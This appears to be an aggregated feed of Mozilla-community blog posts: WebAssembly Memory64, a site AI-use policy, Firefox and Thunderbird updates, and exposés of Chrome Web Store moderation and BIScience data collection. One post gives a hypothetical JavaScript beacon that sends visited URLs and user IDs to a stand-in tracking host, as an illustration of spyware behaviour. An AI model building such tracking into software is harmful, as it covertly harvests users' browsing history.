Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align. 

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

Don Marti: How this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox Nightly: Key Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] added $$$, a console helper that retrieves elements from the document, including those in the ShadowDOM (#1899558)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can access this menu from the cog button in about:addons
    • The "Manage Extension Shortcuts" pane from about:addons. A series of keyboard shortcut mappings for an extension is displayed - one of which is mapped to the F19 key.

      You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys remain invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This layout changes how stories are laid out (new modular layouts instead of the same medium cards, some sections organized into categories)
    • Try it out yourself in Nightly by setting the following to TRUE
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has now been merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 is tracking a fix for an AttributeError hit by mach xpcshell-test as a side effect of the changes applied by Bug 1661935; until the fix lands, mach test is a short-term workaround for running xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the add-on file to the device using base64, which made it possible to install extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which was sometimes unexpectedly set to 0 (#1931514). Prior to that, Julian added a small workaround to fall back on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it has been shipping for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits; the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain svg favicons being wrongly picked, and thus having a bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158 

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new --page-main-content-width design token, which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla Thunderbird: Thunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between some of the factions and solutions which are in place to provide quantum-resistant solutions in a post-quantum world. To provide ourselves with the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower-level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway, and we have already uplifted some features and merged them with 135.0 Beta. See the Meta bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir Palant: Chrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of users worldwide, and one would expect Google to take its responsibility to protect users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

[Screenshot of the Chrome download page: the subtitle “Extend your experience” with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store,” next to a screenshot of the Chrome browser overlaid with symbols representing various extensions.]

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made-up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much for being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged; it still notifies its server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point, but now it is back.
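To make the behavior concrete, here is a hypothetical reconstruction of the kind of telemetry request described above. The endpoint and wire format are assumptions on my part; the parameter names, however, match the query string visible in the screenshot (current_url, tab_id, user_id, distinct_id, local_time):

```javascript
// Hypothetical sketch: how a tracking extension might assemble its beacon.
// The endpoint is made up; the parameter names come from the screenshot.
const TRACKING_ENDPOINT = "https://tracking.example.com/event"; // assumption

function buildBeaconUrl(event) {
  const params = new URLSearchParams({
    current_url: event.currentUrl, // the full URL of the visited page
    tab_id: String(event.tabId),
    user_id: event.userId,         // stable per-install identifier
    distinct_id: event.distinctId,
    local_time: event.localTime,
  });
  return `${TRACKING_ENDPOINT}?${params}`;
}

// In an extension, something like a tabs.onUpdated listener would fire this
// for every navigation, shipping even sensitive query strings upstream.
const url = buildBeaconUrl({
  currentUrl: "https://mail.example.com/search?q=user@example.com",
  tabId: 42,
  userId: "u-123",
  distinctId: "d-456",
  localTime: "2024-12-01T12:00:00",
});
```

Note how the full page URL, email address and all, ends up in the request, tied to a stable user identifier.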

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items and will take action accordingly. Please refer to the possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.

But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way, right?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.

It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of nonsense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP), meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste; pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

It’s not that I was very convinced of DDPRP’s performance. I used that program twice. The first time, I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google who would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google had been made aware of this particular trick a year before my blog post. And again, for some reason Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five-star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five-star reviews on a single day in September – and only a single (negative) review since then. I pointed out that this is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five-star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user rating averaging above 4 stars has likely been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.

To provide a more tangible example: the Blaze VPN, Safum VPN and Snap VPN extensions in Chrome Web Store currently carry the “Featured” badge. These extensions (along with Ishaan VPN, which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical, and in fact clones of Nucleus VPN, which was removed from Chrome Web Store in 2021. They don’t even work: no connection ever succeeds. Users of Nucleus VPN already complained about the extension not working, a fact that the extension compensated for with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on the user interface and generally extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the store’s ranking algorithm seems to weight the badge considerably in an extension’s favor.

How did Google get into this mess?

Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

It’s only with the introduction of Manifest V3 that Chrome now finally prohibits remotely hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.
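For illustration, here is a minimal, hypothetical Manifest V3 manifest requesting that “keys to the kingdom” permission. Chrome summarizes `<all_urls>` host access as “Read and change all your data on all websites” regardless of intent, so a password manager and a data harvester present the user with exactly the same prompt:

```json
{
  "manifest_version": 3,
  "name": "Example Extension",
  "version": "1.0",
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"]
  }]
}
```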

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complaints from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Numbers 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies which can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even if Chrome extensions became unusable, Chrome would likely remain the dominant browser.

In fact, Google has significant incentives to keep one particular class of extensions, ad blockers, ineffective, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir Palant: BIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of claims on the BIScience website, citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily.

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partnered third-party extension developers, who use it to collect and sell clickstream data from their users, again under false pretenses. This SDK sends data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

